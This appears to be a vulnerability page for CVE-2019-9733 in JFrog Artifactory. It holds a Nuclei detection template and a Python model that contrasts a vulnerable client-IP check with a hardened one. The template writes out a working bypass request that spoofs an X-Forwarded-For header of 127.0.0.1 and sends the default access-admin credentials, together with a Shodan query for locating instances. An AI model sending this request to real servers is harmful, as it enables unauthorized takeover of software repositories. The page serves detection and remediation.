| Title | Published | Views | Family |
|---|---|---|---|
| JFrog Artifactory Administrator Authentication Bypass Exploit | 21 Mar 2019 00:00 | – | zdt |
| CVE-2019-9733 | 26 Jan 2025 00:00 | – | circl |
| CVE-2019-9733 | 11 Apr 2019 18:59 | – | cve |
| CVE-2019-9733 | 11 Apr 2019 18:59 | – | cvelist |
| CVE-2019-9733 | 11 Apr 2019 19:29 | – | nvd |
| JFrog Artifactory Administrator Authentication Bypass | 21 Mar 2019 00:00 | – | packetstorm |
| Design/Logic Flaw | 11 Apr 2019 19:29 | – | prion |
| VulnCheck KEV: CVE-2019-9733 | 26 Nov 2023 00:00 | – | vulncheck_kev |
```yaml
id: CVE-2019-9733

info:
  name: JFrog Artifactory 6.7.3 - Admin Login Bypass
  author: akshansh
  severity: critical
  description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass because, by default, the built-in access-admin account is used to reset the password of the admin account. That login is meant to be permitted only from a connection originating on localhost, but the check trusts the X-Forwarded-For HTTP header, so an unauthenticated remote user who sends X-Forwarded-For: 127.0.0.1 can log in with the access-admin account's default credentials and bypass the whitelist of allowed IP addresses. The access-admin account can then use Artifactory's API to request authentication tokens for any user, including admin, and so take full control of all artifacts and repositories managed by Artifactory.
  impact: |
    Successful exploitation gives an unauthenticated remote attacker a session as access-admin, from which authentication tokens for any user (including admin) can be requested, yielding full control of the Artifactory instance.
  remediation: |
    Upgrade to JFrog Artifactory 6.8.6 or later (see the release notes referenced below). Until then, change the default access-admin password and ensure Artifactory is only reachable through a reverse proxy that overwrites, rather than forwards, any client-supplied X-Forwarded-For header.
  reference:
    - http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html
    - https://www.ciphertechs.com/jfrog-artifactory-advisory/
    - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9733
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9733
    epss-score: 0.53879
    epss-percentile: 0.98868
    cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jfrog
    product: artifactory
    shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory"
  tags: cve,cve2019,packetstorm,artifactory,login,jfrog,vkev,vuln

http:
  - raw:
      - |
        POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        X-Requested-With: artUI
        X-Forwarded-For: 127.0.0.1
        Request-Agent: artifactoryUI
        Content-Type: application/json
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/artifactory/webapp/

        {"user":"access-admin","password":"password","type":"login"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username": "access-admin"'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210081707387c1d4dd9ddf9c663f48d3c2a652dbabf349b7dfb91cec17cd9d8f2b66022064e7af4d101bb58881a15d2cd3719667f859356d2044fb90e995cf1e78203a11:922c64590222798bb761d5b6d8e72950
```
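The template above works because the "is this request from localhost?" decision believes a client-supplied X-Forwarded-For header. The following is an added example, not part of the Vulners page, the Nuclei template or JFrog's code: it models that decision in Python with a vulnerable resolver beside a hardened one, and replays the template's request against both. The Request type, the trusted-proxy range, the addresses and the three requests are all constructed assumptions for the example.

```python
# Added example (not the Nuclei template above and not JFrog's code): a model of the
# localhost check that CVE-2019-9733 defeats. The vulnerable resolver takes the client
# address from X-Forwarded-For whoever sent it, so a remote peer can claim 127.0.0.1.
# The hardened resolver honours X-Forwarded-For only when the TCP peer is a configured
# reverse proxy, and then reads the chain right-to-left so the hop the proxy appended
# wins over whatever the client put first.
# All names, addresses and requests below are assumptions constructed for this example.
import ipaddress
from dataclasses import dataclass, field

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")
TRUSTED_PROXIES = ["10.0.0.0/8"]   # assumption: the reverse-proxy tier in front of the app


@dataclass
class Request:
    peer_ip: str                              # TCP peer address as the server sees it
    headers: dict = field(default_factory=dict)
    body: dict = field(default_factory=dict)


def _header(req, name):
    """Case-insensitive header lookup."""
    for k, v in req.headers.items():
        if k.lower() == name.lower():
            return v
    return None


def _is_trusted_proxy(addr):
    a = ipaddress.ip_address(addr)
    return any(a in ipaddress.ip_network(n) for n in TRUSTED_PROXIES)


def client_ip_vulnerable(req):
    """Bug class behind CVE-2019-9733: X-Forwarded-For is believed from any peer."""
    xff = _header(req, "X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()      # attacker-controlled value wins
    return req.peer_ip


def client_ip_hardened(req):
    """Honour X-Forwarded-For only from a trusted proxy; the right-most hop that is
    not one of our proxies is the real client."""
    if not _is_trusted_proxy(req.peer_ip):
        return req.peer_ip                    # direct connection: header is ignored
    xff = _header(req, "X-Forwarded-For")
    if not xff:
        return req.peer_ip
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return req.peer_ip                # malformed chain: fail closed to the peer
        if not _is_trusted_proxy(hop):
            return hop
    return req.peer_ip                        # chain contained only our proxies


def access_admin_login_allowed(req, resolve_client_ip):
    """The intended restriction: access-admin may only authenticate from loopback."""
    if req.body.get("user") != "access-admin":
        return True                           # other users are not address-restricted here
    return ipaddress.ip_address(resolve_client_ip(req)) in LOOPBACK


# Constructed requests (assumed addresses from documentation ranges) ----------------
ATTACK = Request(                             # remote attacker sending the template's request
    peer_ip="203.0.113.7",
    headers={"X-Forwarded-For": "127.0.0.1", "X-Requested-With": "artUI"},
    body={"user": "access-admin", "password": "password", "type": "login"},
)
VIA_PROXY = Request(                          # same attacker behind the real proxy, still spoofing
    peer_ip="10.0.0.5",
    headers={"X-Forwarded-For": "127.0.0.1, 203.0.113.7"},
    body={"user": "access-admin", "password": "password", "type": "login"},
)
LOCAL = Request(                              # genuine localhost password-reset path
    peer_ip="127.0.0.1",
    body={"user": "access-admin", "password": "password", "type": "login"},
)


def evaluate():
    """Outcome of each request under both address resolvers."""
    return {
        name: {
            "vulnerable": access_admin_login_allowed(r, client_ip_vulnerable),
            "hardened": access_admin_login_allowed(r, client_ip_hardened),
        }
        for name, r in {"attack": ATTACK, "via_proxy": VIA_PROXY, "local": LOCAL}.items()
    }


if __name__ == "__main__":
    for name, outcome in evaluate().items():
        print(f"{name:10s} vulnerable={outcome['vulnerable']!s:5s} hardened={outcome['hardened']}")
```

The `VIA_PROXY` case is the one to keep in mind when reviewing a fix: a proxy that appends the peer address to an existing X-Forwarded-For still passes the attacker's `127.0.0.1` through as the first hop, so a resolver that reads the chain left-to-right stays bypassable even with a proxy in place. Only anchoring on the TCP peer and walking the chain from the right closes it.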